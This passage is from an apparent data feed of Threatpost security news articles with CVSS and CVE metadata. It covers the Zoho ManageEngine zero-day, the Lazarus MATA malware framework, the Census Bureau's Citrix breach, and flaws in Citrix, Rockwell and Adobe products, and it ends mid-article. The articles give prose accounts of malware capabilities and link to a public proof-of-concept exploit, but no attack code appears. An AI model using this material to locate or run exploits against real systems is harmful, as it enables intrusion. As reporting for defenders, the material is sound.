everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:13", "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAs far as victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. It\u2019s purpose is to load various plugins \u2013 up to 15 of them. The perform various functions, including sending the command-and-control (C2) information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating a HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed DACLs. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. Kaspersky has linked DACLs to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator meanwhile was found in April, having been ported from the Linux version. It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/DACLS RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\u201d\n", "cvss3": {}, "published": "2020-07-22T16:43:44", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T14:50:21", "description": "Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.\n\nHowever, investigators found that officials were informed of the flaw in its servers and had at least two opportunities to fix it before the attack, mainly due to lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.\n\nThe report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau. \n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) \nCitrix released a public notice about the zero-day flaw\u2014tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\u2013in December. In January, a representative from the bureau\u2019s Computer Incident Response Team (CIRT_ attended two meetings in which the flaw was discussed and attendees even received a link to steps to use fixes which already had been issued by Citrix.\n\n\u201cDespite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,\u201d according to the report. Doing so could have prevented the attack, investigators noted.\n\n## **\u2018Partially Successful\u2019 Attack**\n\nThe Citrix products affected by the flaw\u2013[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies\u2014are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries\u2014about 38 percent in the U.S.\u2014use these products, formerly called NetScaler ADC and Gateway.\n\nThe initial compromise at the Census Bureau was on servers used to provide the bureau\u2019s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.\n\n\u201cThe exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,\u201d according to the report. \u201cHowever, the attacker\u2019s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.\u201d\n\nAttackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. However, the bureau\u2019s firewalls blocked the attacker\u2019s attempts to establish a backdoor to communicate with the attacker\u2019s external command and control infrastructure.\n\n## **Other Mistakes**\n\nAnother security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.\n\n\u201cWe found that the bureau vulnerability scanning team maintained a list of devices to be scanned,\u201d investigators wrote. \u201cHowever, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.\u201d\n\nThe bureau also made mistakes after the attack by not discovering nor reporting the incident in a timely manner, the OIG found.\n\nIT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a a security information and event management tool (SIEM) to proactively alert incident responders of suspicious network traffic, investigators found.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T14:35:49", "type": "threatpost", "title": "Postmortem on U.S. Census Hack Exposes Cybersecurity Failures", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-08-19T14:35:49", "id": "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "href": "https://threatpost.com/postmortem-on-u-s-census-hack-exposes-cybersecurity-failures/168814/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:25:54", "description": "Citrix has quickened its rollout of patches for a critical vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products, on the heels of recent proof-of-concept exploits and skyrocketing exploitation attempts.\n\nSeveral versions of the products still remain unpatched \u2013 but they will be getting a patch sooner than they were slated to. While Citrix originally said some versions would get a patch Jan. 31, it has now also shortened that timeframe, saying fixes are forthcoming on Jan 24 (Friday of this week).\n\nAlso, Citrix patched Citrix ADC and Citrix Gateway version 11.1 (with firmware update Refresh Build 11.1.63.15) and 12 (firmware update Refresh Build 12.0.63.13) on Jan. 19 \u2014 a day earlier than it had expected to.\n\n[![Threatpost Webinar Promo Mobile App Security ](https://media.threatpost.com/wp-content/uploads/sites/103/2020/01/21105319/Webinar_Promo_App_Security-300x220.png)](<https://register.gotowebinar.com/register/7679724086205178371?source=art>)\n\nThe versions that Citrix expects to patch on Jan. 24 include Citrix ADC and Citrix Gateway version 10.5 (with Refresh Build 10.5.70.x), 12.1 (Refresh Build 12.1.55.x), 13 (Refresh Build 13.0.47.x), as well as Citrix SD-WAN WANOP Release 10.2.6 (with Citrix ADC Release 11.1.51.615) and Citrix SD-WAN WANOP Release 11.0.3 (Citrix ADC Release 11.1.51.615).\n\nWhen it was originally disclosed [in December](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>), the vulnerability did not have a patch, and Citrix [announced](<https://support.citrix.com/article/CTX267027>) it would not be issuing fixes for the gateway products and ADC (formerly called NetScaler ADC), a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web, until \u201clate January.\u201d\n\nHowever, in the following weeks after disclosure, various researchers published public [proof-of-concept (PoC) exploit code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) for the flaw. At the same time, [researchers warned of active exploitations](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), and [mass scanning activity](<https://twitter.com/bad_packets/status/1217234838446460929>), for the vulnerable Citrix products.\n\n> CVE-2019-19781 mass scanning activity from these hosts is still ongoing. <https://t.co/pK4Qus1eAo>\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 14, 2020](<https://twitter.com/bad_packets/status/1217234838446460929?ref_src=twsrc%5Etfw>)\n\nIn one unique case of exploitation, [researchers at FireEye said last week](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>) that a threat actor was targeting vulnerable Citrix devices with a previously-unseen payload, which they coined as \u201cNOTROBIN.\u201d\n\nResearchers said that the attack group behind the payload appeared to be scanning for vulnerable ADC devices and deploying their own malware on the devices, which would then delete any previously-installed malware. Researchers suspect that the threat actors may be trying to maintain their own backdoor access in compromised devices.\n\n\u201cUpon gaining access to a vulnerable NetScaler [ADC] device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign,\u201d researchers said.\n\nWith patches now being available or soon to be rolled out, security experts urge customers to update as soon as possible.\n\n\u201cCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available,\u201d according to a Monday CISA alert on the patches. \u201cThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>) and [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>). Until the appropriate update is accessible, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.\u201d\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. _**_**Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from **_**_Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-01-21T17:19:28", "type": "threatpost", "title": "Citrix Accelerates Patch Rollout For Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2020-01-21T17:19:28", "id": "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "href": "https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:00:56", "description": "A critical denial-of-service (DoS) vulnerability has been found in a Rockwell Automation industrial drive, which is a logic-controlled mechanical component used in industrial systems to manage industrial motors.\n\nThe vulnerability was identified in Rockwell Automation\u2019s PowerFlex 525 drive component, which is used in applications such as conveyors, fans, pumps and mixers. The drive offers a wide range of motor and software controls from regulating volts per hertz and software used to manage EtherNet/IP networks.\n\nThe flaw, CVE-2018-19282, could be exploited to manipulate the drive\u2019s physical process and or stop it, according to researchers with Applied Risk who found it. The vulnerability has a CVSS score of 9.1, making it critical, according to researchers.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis finding allows an attacker to crash the Common Industrial Protocol (CIP) in a way that it does not accept any new connection,\u201d Nicholas Merle, with Applied Risk, [wrote in a Thursday analysis](<https://applied-risk.com/application/files/4215/5385/2294/Advisory_AR2019004_Rockwell_Powerflex_525_Denial_of_Service.pdf>) (PDF). \u201cThe current connections however, are kept active, giving attackers complete control over the device.\u201d\n\nThe vulnerability is critical because it gives \u201ccomplete access to the device and DOS for the other users,\u201d an Applied Risk spokesperson told Threatpost. \u201cSo availability and integrity are impacted, with no confidentiality impact. Those are also the most important factors in OT environment.\u201d** **\n\nFor a variable frequency drive, which controls the speed of motors in a live production environment, that kind of shutdown could have a serious impact. There are no known public exploits that target this vulnerability, researchers said. Impacted were versions 5.001 and older for the software.\n\nTo exploit the vulnerability, a bad actor could send a precise sequence of packets effectively crashing the Common Industrial Protocol (the industrial protocol for industrial automation applications) network stack. An Applied Risk spokesperson told Threatpost that an attacker could be remote and wouldn\u2019t need to be authenticated.\n\n[![drive industrial Rockwell automation ](https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/29091619/drive-300x266.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/29091619/drive.png>)\n\nRockwell Automation Powerflex 525\n\nThis creates an error in the control and configuration software, which crashes. After it crashes, it is not possible to initiate a new connection to the device, effectively forbidding any legitimate user to recover control, researchers said.\n\nIf the attacker maintains the connection used to send the payload open, he can continue sending commands as long as the connection is not interrupted, and the only way to recover access to the device is to do a power reset, researchers said.** **\n\n\u201cSending a specific UDP packet, a definite amount of time corrupts the\u2026 daemon forbidding any new connection to be initiated and disconnecting the configuration and control software from Rockwell Automation,\u201d said researchers.\n\nThe flaw was first discovered July 30, 2018 and has since been patched. Rockwell Automation did not respond to a request for comment from Threatpost.\n\nVulnerabilities are particularly insidious when they impact industrial control systems because of the high-risk implications. According to a [U.S. Department of Homeland Security bulletin](<https://ics-cert.us-cert.gov/advisories/ICSA-19-087-01>) the bug ([CVE-2018-19282)](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19282>) the vulnerability is a threat to U.S. critical infrastructure. Downtime for these systems could pose dire monetary \u2013 and in some cases even life-threatening \u2013 risks.\n\nRockwell Automation isn\u2019t the only industrial control system manufacturer facing security woes. In [February](<https://threatpost.com/siemens-critical-remote-code-execution/141768/>), Siemens released 16 security advisories for various industrial control and utility products, including a warning for a critical flaw in the WibuKey digital rights management (DRM) solution that affects the SICAM 230 process control system.\n\nAnd in August, [Schneider Electric](<https://threatpost.com/high-severity-flaws-patched-in-schneider-electric-products/137034/>) released fixes for a slew of vulnerabilities that can be exploited remotely in two of its industrial control system products.\n", "cvss3": {}, "published": "2019-03-29T14:13:54", "type": "threatpost", "title": "Critical Rockwell Automation Bug in Drive Component Puts IIoT Plants at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-19282", "CVE-2019-19781"], "modified": "2019-03-29T14:13:54", "id": "THREATPOST:B956AABD7A9591A8F25851E15000B618", "href": "https://threatpost.com/critical-rockwell-automation-bug-in-drive-component-puts-iiot-plants-at-risk/143258/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-08T11:40:59", "description": "Adobe has issued an emergency patch for a critical vulnerability in its ColdFusion service that is being exploited in the wild.\n\nThe vulnerability, CVE-2019-7816, exists in Adobe\u2019s commercial rapid web application development platform, ColdFusion. The ColdFusion vulnerability is a file upload restriction bypass which could enable arbitrary code execution.\n\n\u201cAdobe has released security updates for ColdFusion versions 2018, 2016 and 11,\u201d according to the company\u2019s [security update](<https://helpx.adobe.com/security/products/coldfusion/apsb19-14.html>). \u201cThese updates resolve a critical vulnerability that could lead to arbitrary code execution in the context of the running ColdFusion service.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThis attack requires the ability to upload executable code to a web-accessible directory, and then execute that code via an HTTP request, so restricting requests to directories where uploaded files are stored will mitigate the attack, Adobe said.\n\nImpacted is ColdFusion 2018, update 2 and earlier; ColdFusion 2016, update 9 and earlier; and ColdFusion 11, update 17 and earlier versions. The security update has a priority 1 rating, meaning that it resolves vulnerabilities being targeted by exploits in the wild.\n\n\u201cAdobe recommends administrators install the update as soon as possible. (for example, within 72 hours),\u201d according to the company\u2019s priority update [page](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nCharlie Arehart, Moshe Ruzin, Josh Ford, Jason Solarek, and Bridge Catalog Team were credited with discovering the vulnerability.\n\nOne of these researchers, Charlie Arehart, told Threatpost that he is still in discussions with Adobe PSIRT about what can be publicly released. In the meantime, no further details about the vulnerability or subsequent exploits have been released.\n\nThe emergency update comes a week after a separate [unscheduled Adobe update](<https://threatpost.com/adobe-re-patches-critical-acrobat-reader-flaw/142098/>), which fixed a critical zero-day vulnerability in Acrobat Reader. The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 26 post, enabled bad actors to steal victims\u2019 hashed password values, known as \u201cNTLM hashes.\u201d\n", "cvss3": {}, "published": "2019-03-01T20:22:43", "type": "threatpost", "title": "Adobe Patches Critical ColdFusion Vulnerability With Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2019-7816"], "modified": "2019-03-01T20:22:43", "id": "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "href": "https://threatpost.com/adobe-patches-critical-coldfusion-vulnerability-with-active-exploit/142391/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:01", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "cvss3": {}, "published": "2019-12-26T19:17:55", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-08T11:40:52", "description": "SAN FRANCISCO \u2013 A previously unknown bug in Microsoft Office has been spotted being actively exploited in the wild; it can be used to bypass security solutions and sandboxes, according to findings released at the RSA Conference 2019.\n\nThe bug exists in the OLE file format and the way it\u2019s handled in Microsoft Word, said researchers from Mimecast. They noted that the OLE32.dll library incorrectly handles integer overflows.\n\nMicrosoft told the researchers that patching the problem is on the back burner.\n\nThe flaw allows attackers to hide 